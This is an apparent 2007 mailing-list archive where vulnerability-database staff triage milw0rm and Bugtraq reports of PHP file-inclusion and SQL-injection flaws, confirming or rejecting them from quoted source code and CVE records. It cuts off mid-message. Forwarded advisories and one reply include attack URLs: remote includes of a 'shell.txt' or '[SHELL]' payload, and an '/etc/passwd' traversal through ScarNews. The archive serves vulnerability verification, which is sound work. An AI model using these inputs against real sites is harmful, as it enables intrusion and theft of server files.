From coley at mitre.org Mon Apr 2 21:17:31 2007 From: coley at mitre.org (Steven M. Christey) Date: Mon, 2 Apr 2007 17:17:31 -0400 (EDT) Subject: [VIM] [true] CWB pro 1.5 INCLUDE_PATH RFI Message-ID: <200704022117.l32LHVB3027971@faron.mitre.org> Ref: http://www.milw0rm.com/exploits/3628 first executable lines of the 373_cwbs1.5_demo.zip download: cls_headline_prod.php include_once($INCLUDE_PATH."cls_products.php"); cls_listorders.php include_once($INCLUDE_PATH."cls_products.php"); [and about 5 other includes] cls_viewpastorders.php include_once($INCLUDE_PATH."cls_products.php"); include_once($INCLUDE_PATH."cls_discounts.php"); - Steve From coley at mitre.org Mon Apr 2 21:29:45 2007 From: coley at mitre.org (Steven M. Christey) Date: Mon, 2 Apr 2007 17:29:45 -0400 (EDT) Subject: [VIM] [true] BT-Sondage-v112 RFI Message-ID: <200704022129.l32LTj0g028224@faron.mitre.org> Researcher: Crackers_Child Ref: http://www.milw0rm.com/exploits/3624 from utilitaires/gestion_sondage.php in the specified download: //if ( !defined( "_GESTION_SONDAGE_PHP" ) ) //{ include($repertoire_visiteur.'utilitaires/affichage_formulaire.php'); - Steve From coley at mitre.org Tue Apr 3 01:22:14 2007 From: coley at mitre.org (Steven M. Christey) Date: Mon, 2 Apr 2007 21:22:14 -0400 (EDT) Subject: [VIM] ajann's XOOPS viewcat.php issues - site-specific or not? Message-ID: <200704030122.l331MEfD002889@faron.mitre.org> ajann's been posting a ton of stuff to milw0rm using SQL injection in "viewcat.php" with a "cid" or similar parameter, theoretically dealing with multiple different modules. This looks like it might be a site-specific issue in http://www.xoops.pr.gov.br, anybody have any thoughts? Or is viewcat.php a required implementation for every xoops module? Searches on www.xoops.org don't seem to find products like Tutoriais (milw0rm 3621). The module file structure documentation at: http://dev.xoops.org/modules/phpwiki/index.php/FileStructure doesn't mention viewcat.php, so maybe it's not a required file anyway. On the other hand, myalbum-P (milw0rm 3632) *does* have a viewcat.php that accepts a cid parameter, although version 2.84 (http://www.xoops.org/modules/repository/singlefile.php?cid=36&lid=1196) seems to perform input validation on the cid parameter at first glance: $cid = empty( $_GET['cid'] ) ? 0 : intval( $_GET['cid'] ) ; *although* after this statement, there's an include of "include/assign_globals.php" (not included the module itself), which is practically begging to have an extract() or $$varname or eval in it. - Steve From sullo at cirt.net Tue Apr 3 01:35:22 2007 From: sullo at cirt.net (Sullo) Date: Mon, 02 Apr 2007 21:35:22 -0400 Subject: [VIM] Site specific: OSVDB-29901: Kinesis Interactive Cinema System (KICS) index.asp Multiple Login Field SQL Injection Message-ID: <4611AF5A.8000901@cirt.net> FYI-- This one is site-specific, it seems. We will be deleting our entry. OSVDB-29901 / CVE-2006-5450 -Sullo -------- Original Message -------- That's correct, the product is 100% web-based. Thanks, -alex At 01:26 AM 30/03/2007, you wrote: > So, there is no software that can be downloaded and installed on a > user's site directly--if I purchase KICS, you provide me a site you > control to manage my web site? > > I want to make sure I understand everything before I make updates to our > entry, which may have ramifications for the other vulnerability > databases as well. > > Thanks > Sullo > > > Alex Daniel wrote: > > Well since it's a web based service, users need not make any changes. > > We plugged this hole the day it was found last year. > > > > Cheers, > > -alex > > From theall at tenablesecurity.com Tue Apr 3 02:16:48 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Mon, 02 Apr 2007 22:16:48 -0400 Subject: [VIM] ajann's XOOPS viewcat.php issues - site-specific or not? In-Reply-To: <200704030122.l331MEfD002889@faron.mitre.org> References: <200704030122.l331MEfD002889@faron.mitre.org> Message-ID: <4611B910.1000307@tenablesecurity.com> On 04/02/07 21:22, Steven M. Christey wrote: > ajann's been posting a ton of stuff to milw0rm using SQL injection in > "viewcat.php" with a "cid" or similar parameter, theoretically dealing > with multiple different modules. This looks like it might be a > site-specific issue in http://www.xoops.pr.gov.br, anybody have any > thoughts? I think he's been looking through the various modules for Xoops much like Xoron seems to be doing for PHP-Fusion and people did before for Mambo / Joomla and phpBB. And while I haven't looked at all of the modules, I did look at a couple of the more popular ones (Articles, Debaser, and WF-Section) and verified that the flaws do exist. [These do, though, involve different parameters and scripts than cid / viewcat.php.] George -- theall at tenablesecurity.com From str0ke at milw0rm.com Tue Apr 3 13:47:28 2007 From: str0ke at milw0rm.com (str0ke) Date: Tue, 3 Apr 2007 07:47:28 -0600 Subject: [VIM] [milw0rm] exploit 3643 Message-ID: <814b9d50704030647l16e3f9b5x47158a89740e2d93@mail.gmail.com> Oracle 10g DBMS_AQ.ENQUEUE SQL Injection Exploit The above exploit has been removed by the authors request. There was an issue with it working correctly outside of his testbed. /str0ke From gmdarkfig at gmail.com Tue Apr 3 17:31:38 2007 From: gmdarkfig at gmail.com (GM darkfig) Date: Tue, 3 Apr 2007 19:31:38 +0200 Subject: [VIM] [false] Remote File Include In Script stat12 Message-ID: Message: http://www.securityfocus.com/archive/1/464582/30/0/threaded Author: RaeD at BsdMail.Com When we search "Copyright (c) 2004 by Sam Tang" there is only one result (1) and on the server, the php is not interpreted ... we can read the source code. The title of the script is not "stat12" but "PHP i-Stats". The website (2) of the author is down. The file inclusion will not work : require_once('global.php');...define('LANGPATH', 'lang/'); [1] - http://www.tiger.edu.pl/ [2] - http://www.samphp.com From theall at tenablesecurity.com Tue Apr 3 19:08:10 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Tue, 03 Apr 2007 15:08:10 -0400 Subject: [VIM] Bogus - [Xoops Module Virii Info <= 1.10 (index.php) Remote File Include Exploit] Message-ID: <4612A61A.1070006@tenablesecurity.com> Looks like milw0rm 3642 from ajann is bogus, or at least dependent on the version of Xoops -- I tested under Xoops 2.0.12, which is from June 2005, I believe. I grabbed a copy of the module from . modules/virii/index.php has this as its first couple of executable statements: include ("header.php"); include("../../header.php"); include_once($xoopsConfig['root_path']."class/xoopsmodule.php"); and modules/virii/header.php has: include("../../mainfile.php"); which includes Xoops' mainfile.php. That in turn generally includes include/common.php and class/xoopssecurity.php and then calls checkSuperglobals() from the latter. checkSuperglobals() makes sure someone isn't trying to muck with various important variables, including xoopsConfig; if so, it causes the script to die. Now you can bypass the initial check in class/xoopssecurity.php by setting xoopsOption[nocommon] if register_globals is enabled, but then script execution proceeds to Xoops' main header.php and eventually to class/template.php, at which point it stops because SMARTY_DIR is not defined (it normally would be in include/common.php). Apologies if this seems long-winded. George -- theall at tenablesecurity.com From str0ke at milw0rm.com Tue Apr 3 19:41:39 2007 From: str0ke at milw0rm.com (str0ke) Date: Tue, 3 Apr 2007 13:41:39 -0600 Subject: [VIM] Bogus - [Xoops Module Virii Info <= 1.10 (index.php) Remote File Include Exploit] In-Reply-To: <4612A61A.1070006@tenablesecurity.com> References: <4612A61A.1070006@tenablesecurity.com> Message-ID: <814b9d50704031241n355e3486ib84b0c949687839c@mail.gmail.com> George, Correcto. Removing the vulnerability. /str0ke On 4/3/07, George A. Theall wrote: > Looks like milw0rm 3642 from ajann is bogus, or at least dependent on > the version of Xoops -- I tested under Xoops 2.0.12, which is from June > 2005, I believe. > > I grabbed a copy of the module from > . > modules/virii/index.php has this as its first couple of executable > statements: > > include ("header.php"); > include("../../header.php"); > include_once($xoopsConfig['root_path']."class/xoopsmodule.php"); > > and modules/virii/header.php has: > > include("../../mainfile.php"); > > which includes Xoops' mainfile.php. That in turn generally includes > include/common.php and class/xoopssecurity.php and then calls > checkSuperglobals() from the latter. checkSuperglobals() makes sure > someone isn't trying to muck with various important variables, including > xoopsConfig; if so, it causes the script to die. > > Now you can bypass the initial check in class/xoopssecurity.php by > setting xoopsOption[nocommon] if register_globals is enabled, but then > script execution proceeds to Xoops' main header.php and eventually to > class/template.php, at which point it stops because SMARTY_DIR is not > defined (it normally would be in include/common.php). > > Apologies if this seems long-winded. > > George > -- > theall at tenablesecurity.com > From str0ke at milw0rm.com Tue Apr 3 21:03:14 2007 From: str0ke at milw0rm.com (str0ke) Date: Tue, 3 Apr 2007 15:03:14 -0600 Subject: [VIM] [milw0rm] exploit 3401 Message-ID: <814b9d50704031403o685fb10dg72014d566658e4b4@mail.gmail.com> Oracle 9i/10g DBMS_EXPORT_EXTENSION SQL Injection Exploit v2 The above exploit has been removed by the authors request. There was an issue with it working correctly outside of his testbed. /str0ke From theall at tenablesecurity.com Wed Apr 4 14:23:24 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Wed, 04 Apr 2007 10:23:24 -0400 Subject: [VIM] Deja Vu: phpMyNewsletter <= 0.6.12 (l) Remote File Include Exploit Message-ID: <4613B4DC.3050102@tenablesecurity.com> Hey str0ke, this (milw0rm 3658) looks like a repeat of an issue reported back in 2002 and covered by CVE-2002-1887 / Bugtraq ID 5886: http://archives.neohapsis.com/archives/bugtraq/2002-10/0060.html http://archives.neohapsis.com/archives/bugtraq/2003-02/0074.html The first original message was for version 0.6.10. The second is for 0.6.11, which contains a brain-damaged attempt to fix the issue. Also note that the vendor link in milw0rm 3658 is actually for the 0.6.10 code even though bd0rk talks about 0.6.12 in the advisory. George -- theall at tenablesecurity.com From str0ke at milw0rm.com Wed Apr 4 14:30:24 2007 From: str0ke at milw0rm.com (str0ke) Date: Wed, 4 Apr 2007 08:30:24 -0600 Subject: [VIM] Deja Vu: phpMyNewsletter <= 0.6.12 (l) Remote File Include Exploit In-Reply-To: <4613B4DC.3050102@tenablesecurity.com> References: <4613B4DC.3050102@tenablesecurity.com> Message-ID: <814b9d50704040730g622e5eb8wd97d43df07024621@mail.gmail.com> George, Appreciate the info, changing the author and the script to reflect who the original finder was. /str0ke On 4/4/07, George A. Theall wrote: > Hey str0ke, this (milw0rm 3658) looks like a repeat of an issue reported > back in 2002 and covered by CVE-2002-1887 / Bugtraq ID 5886: > > http://archives.neohapsis.com/archives/bugtraq/2002-10/0060.html > http://archives.neohapsis.com/archives/bugtraq/2003-02/0074.html > > The first original message was for version 0.6.10. The second is for > 0.6.11, which contains a brain-damaged attempt to fix the issue. > > Also note that the vendor link in milw0rm 3658 is actually for the > 0.6.10 code even though bd0rk talks about 0.6.12 in the advisory. > > George > -- > theall at tenablesecurity.com > From str0ke at milw0rm.com Thu Apr 5 21:13:07 2007 From: str0ke at milw0rm.com (str0ke) Date: Thu, 5 Apr 2007 15:13:07 -0600 Subject: [VIM] true: XOOPS Module Jobs <= 2.4 (cid) SQL Injection Exploit Message-ID: <814b9d50704051413k1b97d24bmd3276889018cd980@mail.gmail.com> XOOPS Module Job Listings <= 2.1 (cid) Remote BLIND SQL Injection Exploit http://www.milw0rm.com/exploits/3672 The correct name should be Jobs and the sourcecode below is for the latest version 2.4. vendor url: http://www.jlmzone.com/ ########### modules index.php ############## pa = isset( $_GET['pa'] ) ? $_GET['pa'] : '' ; $lid = isset( $_GET['lid'] ) ? $_GET['lid'] : '' ; $cid = isset( $_GET['cid'] ) ? $_GET['cid'] : '' ; $debut = isset( $_GET['debut'] ) ? $_GET['debut'] : '' ; switch($pa) { case "jobsview": $xoopsOption['template_main'] = 'jobs_category.html'; include(XOOPS_ROOT_PATH."/header.php"); jobsview($cid, $debut); break; ########### function jobsview ######### $requete = $xoopsDB->query("select cid, pid, title from ".$xoopsDB->prefix("jobs_categories")." where cid=".$cid.""); list($ccid, $pid, $title) = $xoopsDB->fetchRow($requete); $title = $myts->makeTboxData4Show($title); $varid[$x]=$ccid; $varnom[$x]=$title; ################################## /str0ke -------------- next part -------------- A non-text attachment was scrubbed... Name: xoopsjobexp.zip Type: application/zip Size: 1135 bytes Desc: not available Url : http://www.attrition.org/pipermail/vim/attachments/20070405/ac3dbd51/attachment.zip From str0ke at milw0rm.com Fri Apr 6 16:01:53 2007 From: str0ke at milw0rm.com (str0ke) Date: Fri, 6 Apr 2007 10:01:53 -0600 Subject: [VIM] false: phpContact Multiple Remote File Inclusion Vulnerabilities Message-ID: <814b9d50704060901u1cc29c73o7c987f219625acb9@mail.gmail.com> //Source: http://codewand.org/download/phpContact.zip contact_business.php ---------------------------------------- include("include/include_preferences.inc.php"); include($include_path . "include_session.inc.php"); include($include_path . "include_mysql_connect.inc.php"); include_preferences.inc.php ---------------------------------------- $include_path = "include/"; // Where include files reside relative to index_.php file /str0ke ---------- Forwarded message ---------- From: rko.thelegendkiller at gmail.com Date: 6 Apr 2007 07:19:53 -0000 Subject: phpContact Multiple Remote File Inclusion Vulnerabilities To: bugtraq at securityfocus.com /* phpContact Multiple Remote File Inclusion Vulnerabilities */ //Author: Arham Muhammad //Vulnerable Files: /contact_business.php, /contact_person.php //Source: http://codewand.org/download/phpContact.zip //Vulnerable Code: include($include_path . "include_session.inc.php"); //Expl0it: http://victim/path/contact_business.php?include_path=shell.txt? // http://victim/path/contact_person.php?include_path=shell.txt? //Greets: Usman,tushy,Hackman,str0ke From theall at tenablesecurity.com Mon Apr 9 12:16:59 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Mon, 09 Apr 2007 08:16:59 -0400 Subject: [VIM] Mostly Bogus: ScarAdControl 1.1 Remote/Local File Inclusion Vulnerabilities Message-ID: <461A2EBB.6070002@tenablesecurity.com> Milw0rm 3682 describes two flaws, neither of which looks valid to me, at least as BeyazKurt describes them: - scaradcontrol.php has this near the start: ### du musst die '//' davor entfernen !! // $sac_config_dir = "/www/user234/cats/scaradcontrol/"; If my German's any good, this says you have to uncomment the definition of $sac_config_dir (and presumably define it according to your site's layout). Between that and the include(), there's no chance for an attacker to override the definition and hence gain control of the variable. So the only way the flaw is valid is if someone just unzips the distribution file in their document root and doesn't bother doing an install. - admin/index.php has this at lines 133 - 143: } elseif(md5($sac_pass)==$pass && md5($sac_user)==$user){ if ($site=="code") { @code_box($id,$cat); } else { if(file_exists("$site.php")){ include("$site.php"); So ok, the flaw does exist but you can't exploit it unless you have credentials. George -- theall at tenablesecurity.com From str0ke at milw0rm.com Mon Apr 9 12:29:56 2007 From: str0ke at milw0rm.com (str0ke) Date: Mon, 9 Apr 2007 07:29:56 -0500 Subject: [VIM] Mostly Bogus: ScarAdControl 1.1 Remote/Local File Inclusion Vulnerabilities In-Reply-To: <461A2EBB.6070002@tenablesecurity.com> References: <461A2EBB.6070002@tenablesecurity.com> Message-ID: <814b9d50704090529y5c6f80ceve1ccd35389a6b162@mail.gmail.com> [milw0rm] 3682 << has been removed. I knew there was something fishy about it :) /str0ke On 4/9/07, George A. Theall wrote: > Milw0rm 3682 describes two flaws, neither of which looks valid to me, at > least as BeyazKurt describes them: > > - scaradcontrol.php has this near the start: > > ### du musst die '//' davor entfernen !! > > // $sac_config_dir = "/www/user234/cats/scaradcontrol/"; > > If my German's any good, this says you have to uncomment the definition > of $sac_config_dir (and presumably define it according to your site's > layout). Between that and the include(), there's no chance for an > attacker to override the definition and hence gain control of the > variable. So the only way the flaw is valid is if someone just unzips > the distribution file in their document root and doesn't bother doing an > install. > > - admin/index.php has this at lines 133 - 143: > > } elseif(md5($sac_pass)==$pass && md5($sac_user)==$user){ > > if ($site=="code") { > > @code_box($id,$cat); > > } else { > > if(file_exists("$site.php")){ > > include("$site.php"); > > So ok, the flaw does exist but you can't exploit it unless you have > credentials. > > > George > -- > theall at tenablesecurity.com > From theall at tenablesecurity.com Mon Apr 9 15:32:55 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Mon, 09 Apr 2007 11:32:55 -0400 Subject: [VIM] ScarNews 1.2.1 (sn_admin_dir) Local File Inclusion Exploit Message-ID: <461A5CA7.5050608@tenablesecurity.com> Milw0rm 3687 is for a local file include in a German news script. If I read the PoC correctly, the flaw lies with the 'sn_admin_dir' parameter of the 'scarnews.inc.php' script. The vendor seems to have just patched several files; eg, http://www.scar4u.de/news/index.php?sn_show_news=117 yet the version remains pegged at 1.2.1. Anyone have a copy of the affected file before the changes? The version I just grabbed has this at the top: if(!defined("SN_INCLUDE")) { die("ACCESS FORBIDDEN"); } preventing it from being called directly and which I suspect is what's just been changed. Later in the file, we have global variable registration as long as the parameter starts with "sn_": $sn_get_post = $_REQUEST; foreach ($sn_get_post as $sn_key => $sn_value) { if(ereg("^sn_",$sn_key)) { ${$sn_key} = $sn_value; } } and then: if(file_exists($sn_admin_dir."admin/config.inc.php")) { ### include($sn_admin_dir."admin/config.inc.php"); ### } else { So, the issue is probably valid. George -- theall at tenablesecurity.com From str0ke at milw0rm.com Mon Apr 9 16:00:39 2007 From: str0ke at milw0rm.com (str0ke) Date: Mon, 9 Apr 2007 11:00:39 -0500 Subject: [VIM] ScarNews 1.2.1 (sn_admin_dir) Local File Inclusion Exploit In-Reply-To: <461A5CA7.5050608@tenablesecurity.com> References: <461A5CA7.5050608@tenablesecurity.com> Message-ID: <814b9d50704090900i5962ca9jb00d9465badb80bd@mail.gmail.com> Hey George, Wish I would of had a backup for you. The die() wasn't there before and was modified. if(!defined("SN_INCLUDE")) { die("ACCESS FORBIDDEN"); } Its still vulnerable with or without register globals but we need magic quotes = off. scarnews.php ####################### if(!$sn_db_handel && file_exists($sn_admin_dir."scarnews.inc.php")) { include($sn_admin_dir."scarnews.inc.php"); scarnews.inc.php ################################## $sn_get_post = $_REQUEST; foreach ($sn_get_post as $sn_key => $sn_value) { if(ereg("^sn_",$sn_key)) { ${$sn_key} = $sn_value; } } $PHP_SELF = $_SERVER['PHP_SELF']; ###################################################################### ### ### ### Einbinden der Konfigurationen ### if(file_exists($sn_admin_dir."admin/config.inc.php")) { ### include($sn_admin_dir."admin/config.inc.php"); ### } else { http://site.com/scarnews.inc.php?sn_admindir=../../../etc/passwd%00 /str0ke On 4/9/07, George A. Theall wrote: > Milw0rm 3687 is for a local file include in a German news script. If I > read the PoC correctly, the flaw lies with the 'sn_admin_dir' parameter > of the 'scarnews.inc.php' script. The vendor seems to have just patched > several files; eg, > > http://www.scar4u.de/news/index.php?sn_show_news=117 > > yet the version remains pegged at 1.2.1. Anyone have a copy of the > affected file before the changes? The version I just grabbed has this at > the top: > > if(!defined("SN_INCLUDE")) { > die("ACCESS FORBIDDEN"); > } > > preventing it from being called directly and which I suspect is what's > just been changed. Later in the file, we have global variable > registration as long as the parameter starts with "sn_": > > $sn_get_post = $_REQUEST; > foreach ($sn_get_post as $sn_key => $sn_value) { > if(ereg("^sn_",$sn_key)) { ${$sn_key} = $sn_value; } > } > > and then: > > if(file_exists($sn_admin_dir."admin/config.inc.php")) { ### > include($sn_admin_dir."admin/config.inc.php"); ### > } else { > > So, the issue is probably valid. > > > George > -- > theall at tenablesecurity.com > From str0ke at milw0rm.com Tue Apr 10 19:44:05 2007 From: str0ke at milw0rm.com (str0ke) Date: Tue, 10 Apr 2007 14:44:05 -0500 Subject: [VIM] false: phpGalleryScript 1.0 - File Inclusion Vulnerabilities Message-ID: <814b9d50704101244w4c3718fbk3698ac67189fde2c@mail.gmail.com> init.gallery.php #######################3 $inc_path = dirname($include_class); require ($inc_path."/class.gallery.php"); include($inc_path."/config.gallery.php"); .... #######################3 dirname("http://milw0rm.com") == http: /str0ke ---------- Forwarded message ---------- From: z12xxa at gmail.com Date: 9 Apr 2007 23:19:32 -0000 Subject: phpGalleryScript 1.0 - File Inclusion Vulnerabilities To: bugtraq at securityfocus.com vendor url: http://tomex.org/ http://[victim]/php/init.gallery.php?include_class=[SHELL] From rkeith at securityfocus.com Tue Apr 10 19:58:13 2007 From: rkeith at securityfocus.com (rkeith at securityfocus.com) Date: Tue, 10 Apr 2007 13:58:13 -0600 (MDT) Subject: [VIM] false: phpGalleryScript 1.0 - File Inclusion Vulnerabilities In-Reply-To: <814b9d50704101244w4c3718fbk3698ac67189fde2c@mail.gmail.com> References: <814b9d50704101244w4c3718fbk3698ac67189fde2c@mail.gmail.com> Message-ID: dirname("http://milw0rm.com/test") => http://milw0rm.com Looks valid to me. -- Rob Keith Symantec On Tue, 10 Apr 2007, str0ke wrote: > init.gallery.php > #######################3 > > $inc_path = dirname($include_class); > require ($inc_path."/class.gallery.php"); > include($inc_path."/config.gallery.php"); > .... > #######################3 > > dirname("http://milw0rm.com") == http: > > /str0ke > > ---------- Forwarded message ---------- > From: z12xxa at gmail.com > Date: 9 Apr 2007 23:19:32 -0000 > Subject: phpGalleryScript 1.0 - File Inclusion Vulnerabilities > To: bugtraq at securityfocus.com > > > vendor url: http://tomex.org/ > > http://[victim]/php/init.gallery.php?include_class=[SHELL] > From str0ke at milw0rm.com Tue Apr 10 20:35:32 2007 From: str0ke at milw0rm.com (str0ke) Date: Tue, 10 Apr 2007 15:35:32 -0500 Subject: [VIM] false: phpGalleryScript 1.0 - File Inclusion Vulnerabilities In-Reply-To: References: <814b9d50704101244w4c3718fbk3698ac67189fde2c@mail.gmail.com> Message-ID: <814b9d50704101335w4f456830s1144ed162cceaad5@mail.gmail.com> Ahh didn't think about that :) /str0ke On 4/10/07, rkeith at securityfocus.com wrote: > dirname("http://milw0rm.com/test") => http://milw0rm.com > > Looks valid to me. > > -- > Rob Keith > Symantec > > On Tue, 10 Apr 2007, str0ke wrote: > > > init.gallery.php > > #######################3 > > > > $inc_path = dirname($include_class); > > require ($inc_path."/class.gallery.php"); > > include($inc_path."/config.gallery.php"); > > .... > > #######################3 > > > > dirname("http://milw0rm.com") == http: > > > > /str0ke > > > > ---------- Forwarded message ---------- > > From: z12xxa at gmail.com > > Date: 9 Apr 2007 23:19:32 -0000 > > Subject: phpGalleryScript 1.0 - File Inclusion Vulnerabilities > > To: bugtraq at securityfocus.com > > > > > > vendor url: http://tomex.org/ > > > > http://[victim]/php/init.gallery.php?include_class=[SHELL] > > > From coley at mitre.org Wed Apr 11 00:56:43 2007 From: coley at mitre.org (Steven M. Christey) Date: Tue, 10 Apr 2007 20:56:43 -0400 (EDT) Subject: [VIM] True: MyBlog games.php RFI Message-ID: <200704110056.l3B0uhmt001344@faron.mitre.org> Researcher: the_Edit0r Ref: BUGTRAQ:20070404 MyBlog: PHP and MySQL Blog/CMS software Remote File Include Vulnerabilitiy URL:http://www.securityfocus.com/archive/1/archive/1/464716/100/0/threaded A download of the code on April 10 yielded the following for os/games.php: if (isset($_GET['scoreid'])) { echo "Top Score for this game: "; include($_GET['scoreid'] . "_score.txt"); echo ", Set By:"; include($_GET['scoreid'] . "_setby.txt"); } The modify.php XSS was not findable in 2.2 seconds' effort but might be resultant XSS from a verbose/unquoted MySQL error message. This was not proven. - Steve From theall at tenablesecurity.com Wed Apr 11 13:06:24 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Wed, 11 Apr 2007 09:06:24 -0400 Subject: [VIM] Confirm: Joomla/Mambo Component Taskhopper 1.1 RFI Vulnerabilities Message-ID: <461CDD50.7060309@tenablesecurity.com> Well what do you know... I installed version 1.1.2.2 of this component in Joomla and sure enough, the exploits work as long as register_globals is enabled! George -- theall at tenablesecurity.com From coley at mitre.org Wed Apr 11 18:55:50 2007 From: coley at mitre.org (Steven M. Christey) Date: Wed, 11 Apr 2007 14:55:50 -0400 (EDT) Subject: [VIM] Duplicate CVE's for Net-SNMP issues Message-ID: <200704111855.l3BIto85022609@faron.mitre.org> Normally, CVE dupes are fairly straightforward, but it took some coordination with Sun and Net-SNMP to find and address this dupe, and a lot of vuln DB's may be affected. See the analysis for CVE-2005-2177 below. It was even more painful than it sounds ;-) - Steve ====================================================== Name: CVE-2005-2177 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2177 Acknowledged: yes advisory Announced: 20050708 Flaw: other Reference: BUGTRAQ:20061113 VMSA-2006-0006 - VMware ESX Server 2.5.3 Upgrade Patch 4 Reference: URL:http://www.securityfocus.com/archive/1/archive/1/451404/100/0/threaded Reference: BUGTRAQ:20061113 VMSA-2006-0005 - VMware ESX Server 2.5.4 Upgrade Patch 1 Reference: URL:http://www.securityfocus.com/archive/1/archive/1/451419/100/200/threaded Reference: BUGTRAQ:20061113 VMSA-2006-0007 - VMware ESX Server 2.1.3 Upgrade Patch 2 Reference: URL:http://www.securityfocus.com/archive/1/archive/1/451417/100/200/threaded Reference: BUGTRAQ:20061113 VMSA-2006-0008 - VMware ESX Server 2.0.2 Upgrade Patch 2 Reference: URL:http://www.securityfocus.com/archive/1/archive/1/451426/100/200/threaded Reference: MISC:http://www.net-snmp.org/about/ChangeLog.html Reference: MLIST:[net-snmp-announce] 20050701 Multiple new Net-SNMP releases to fix a security related bug Reference: URL:http://sourceforge.net/mailarchive/forum.php?thread_id=7659656&forum_id=12455 Reference: CONFIRM:http://support.avaya.com/elmodocs2/security/ASA-2005-225.pdf Reference: CONFIRM:http://www.vmware.com/download/esx/esx-202-200610-patch.html Reference: CONFIRM:http://www.vmware.com/download/esx/esx-213-200610-patch.html Reference: CONFIRM:http://www.vmware.com/download/esx/esx-254-200610-patch.html Reference: DEBIAN:DSA-873 Reference: URL:http://www.debian.org/security/2005/dsa-873 Reference: MANDRIVA:MDKSA-2006:025 Reference: URL:http://frontal2.mandriva.com/security/advisories?name=MDKSA-2006:025 Reference: REDHAT:RHSA-2005:373 Reference: URL:http://www.redhat.com/support/errata/RHSA-2005-373.html Reference: REDHAT:RHSA-2005:395 Reference: URL:http://www.redhat.com/support/errata/RHSA-2005-395.html Reference: REDHAT:RHSA-2005:720 Reference: URL:http://www.redhat.com/support/errata/RHSA-2005-720.html Reference: SUNALERT:102725 Reference: URL:http://sunsolve.sun.com/search/document.do?assetkey=1-26-102725-1 Reference: SUSE:SUSE-SR:2005:024 Reference: URL:http://www.novell.com/linux/security/advisories/2005_24_sr.html Reference: TRUSTIX:2005-0034 Reference: URL:http://www.trustix.org/errata/2005/0034/ Reference: UBUNTU:USN-190-1 Reference: URL:http://www.ubuntu.com/usn/usn-190-1 Reference: BID:14168 Reference: URL:http://www.securityfocus.com/bid/14168 Reference: BID:21256 Reference: URL:http://www.securityfocus.com/bid/21256 Reference: FRSIRT:ADV-2006-4502 Reference: URL:http://www.frsirt.com/english/advisories/2006/4502 Reference: FRSIRT:ADV-2006-4677 Reference: URL:http://www.frsirt.com/english/advisories/2006/4677 Reference: SECTRACK:1017273 Reference: URL:http://securitytracker.com/id?1017273 Reference: SECUNIA:15930 Reference: URL:http://secunia.com/advisories/15930 Reference: SECUNIA:18635 Reference: URL:http://secunia.com/advisories/18635 Reference: SECUNIA:17217 Reference: URL:http://secunia.com/advisories/17217 Reference: SECUNIA:17343 Reference: URL:http://secunia.com/advisories/17343 Reference: SECUNIA:17135 Reference: URL:http://secunia.com/advisories/17135 Reference: SECUNIA:17282 Reference: URL:http://secunia.com/advisories/17282 Reference: SECUNIA:16999 Reference: URL:http://secunia.com/advisories/16999 Reference: SECUNIA:17007 Reference: URL:http://secunia.com/advisories/17007 Reference: SECUNIA:22875 Reference: URL:http://secunia.com/advisories/22875 Reference: SECUNIA:23058 Reference: URL:http://secunia.com/advisories/23058 Net-SNMP 5.0.x before 5.0.10.2, 5.2.x before 5.2.1.2, and 5.1.3, when net-snmp is using stream sockets such as TCP, allows remote attackers to cause a denial of service (daemon hang and CPU consumption) via a TCP packet of length 1, which triggers an infinite loop. Analysis: ABSTRACTION: CVE-2006-5941 was flagged as a dupe of CVE-2005-2177 by Net-SNMP and Sun in various e-mails from November 2006 to April 2007, with the greatest clarification provided by Thomas Anders on Nov 30. Summary: 1. the original description for CVE-2005-2177 was based on a slightly vague disclosure by Net-SNMP; later information would show that it deals with a length-1 TCP packet. 2. the NEWS file included the same text in a "Security:" item for both 5.0.10.1 and 5.0.10.2, but diff analysis had shown there were slightly different issues. 3. Sun requested CVE-2006-5941, since their information did not exactly match their understanding of CVE-2005-2177. 4. After publication of CVE-2006-5941, Net-SNMP and SuSE spotted the issue as a potential dupe. 5. Further conversation with all parties made it clear that Net-SNMP had fixed a separate issue, CVE-2005-4837, in a similar version, but had not elevated it to "vulnerability" status. CVE-2006-5941 was thus rejected. ====================================================== Name: CVE-2005-4837 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4837 Acknowledged: Announced: 20050609 Flaw: dos-malform Reference: CONFIRM:http://sourceforge.net/tracker/index.php?func=detail&aid=1207023&group_id=12694&atid=112694 snmp_api.c in snmpd in Net-SNMP 5.2.x before 5.2.2, 5.1.x before 5.1.3, and 5.0.x before 5.0.10.2, when running in master agentx mode, allows remote attackers to cause a denial of service (crash) by causing a particular TCP disconnect, which triggers a free of an incorrect variable, a different vulnerability than CVE-2005-2177. ====================================================== Name: CVE-2006-5941 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5941 Acknowledged: Announced: Flaw: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2005-2177. Reason: This candidate is a duplicate of CVE-2005-2177. Notes: All CVE users should reference CVE-2005-2177 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage. Analysis: ACCURACY: see CVE-2005-2177 analysis for an explanation of how the dupe arose and was addressed. From coley at mitre.org Wed Apr 11 22:13:08 2007 From: coley at mitre.org (Steven M. Christey) Date: Wed, 11 Apr 2007 18:13:08 -0400 (EDT) Subject: [VIM] Rediscovery: Flexphpnews news.php/newsid SQL injection Message-ID: <200704112213.l3BMD832026426@faron.mitre.org> Researcher: Dj7xpl Ref: http://www.milw0rm.com/exploits/3631 Rediscovery of CVE-2005-1237 - same vectors (newsid param and news.php), same bug type. Also: verified by source inspection by one of our team members. news.php has 'require("./NewsSql.inc.php");' and '$result = $db->getnewsbyid($newsid);'. NewsSql.inc.php has function getnewsbyid($newsid) ... $sql = "select * from news where newsid='$newsid'"; ... $result = $this->select($sql);. - Steve From coley at mitre.org Wed Apr 11 22:47:29 2007 From: coley at mitre.org (Steven M. Christey) Date: Wed, 11 Apr 2007 18:47:29 -0400 (EDT) Subject: [VIM] WF-Sections SQL injection vendor ack; shows up in other modules Message-ID: <200704112247.l3BMlTW5027136@faron.mitre.org> Researcher: ajann Refs: milw0rm 3644, 3645, 3646 Probably only OSVDB and CVE make these distinctions, but these recent 